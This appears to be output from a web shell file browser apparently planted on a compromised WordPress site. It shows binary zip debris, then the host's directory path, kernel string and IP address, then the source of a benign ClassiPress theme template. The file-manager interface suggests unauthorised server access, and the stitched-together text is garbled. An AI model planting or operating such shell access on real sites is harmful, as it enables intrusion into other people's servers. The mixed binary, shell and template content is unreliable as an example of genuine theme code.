PK œqhYî¶J‚ßFßF)nhhjz3kjnjjwmknjzzqznjzmm1kzmjrmz4qmm.itm/*\U8ewW087XJD%onwUMbJa]Y2zT?AoLMavr%5P*/ $#$#$#

Dir : /home/trave494/footcrew.com/ads/wp-content/themes/classipress/parts/
Server: Linux ngx353.inmotionhosting.com 4.18.0-553.22.1.lve.1.el8.x86_64 #1 SMP Tue Oct 8 15:52:54 UTC 2024 x86_64
IP: 209.182.202.254
Choose File :

Url:
Dir : /home/trave494/footcrew.com/ads/wp-content/themes/classipress/parts/content-cover.php

<?php
/**
 * Blog post single loop content head cover template.
 *
 * @package ClassiPress\Templates
 * @since 4.0.0
 */

?>

<div <?php echo apply_filters( 'cp_background_cover', 'entry-cover fixed-cover text-center', array( 'size' => 'full' ) ); ?>>

	<div class="hero-post-wrap row">

		<div class="column">

			<header class="entry-header">

				<?php appthemes_before_post_title( get_post_type() ); ?>

				<?php the_title( '<h1 class="entry-title">', '</h1>' ); ?>

				<?php appthemes_after_post_title( get_post_type() ); ?>

				<div class="entry-meta">

					<span class="entry-meta-left"><span class="entry-author"><?php _e( 'By', APP_TD ); ?> <?php the_author_posts_link(); ?></span></span>

					<span class="entry-avatar">
						<?php echo get_avatar( get_the_author_meta( 'user_email' ), 96 ); ?>
					</span>

					<span class="entry-meta-right">
						<span class="entry-date"><?php echo get_the_date(); ?></span>
					</span>

				</div> <!-- .entry-meta -->

				<div class="entry-meta-sub">

					<span class="entry-category">
						<i class="fa fa-folder-open-o" aria-hidden="true"></i> <?php the_category( ', ' ); ?>
					</span>

					<span class="entry-comments sep-l">
						<i class="fa fa-comments-o" aria-hidden="true"></i>  <?php printf( _nx( '1 Comment', '%1$s Comments', get_comments_number(), 'comments title', APP_TD ), number_format_i18n( get_comments_number() ) ); ?>
					</span>

					<?php
					/**
					 * Fires in the single listing hero meta section.
					 *
					 * @since 4.0.0
					 */
					do_action( 'cp_post_single_hero_meta' );
					?>

				</div> <!-- .entry-meta-sub -->

				<?php
				/**
				 * Fires in the single page header.
				 *
				 * @since 4.0.0
				 */
				do_action( 'cp_single_template_header' );
				?>

			</header>

		</div> <!-- .column -->

	</div> <!-- .row -->

	<div class="hero-listing-bar">

		<div class="row">

			<div class="columns">

				<?php
				/**
				 * Fires in the single listing hero footer section.
				 *
				 * @since 4.0.0
				 */
				do_action( 'cp_post_single_bar_actions' );
				?>

			</div> <!-- .columns -->

		</div> <!-- .row -->

	</div> <!-- .hero-listing-bar -->

</div>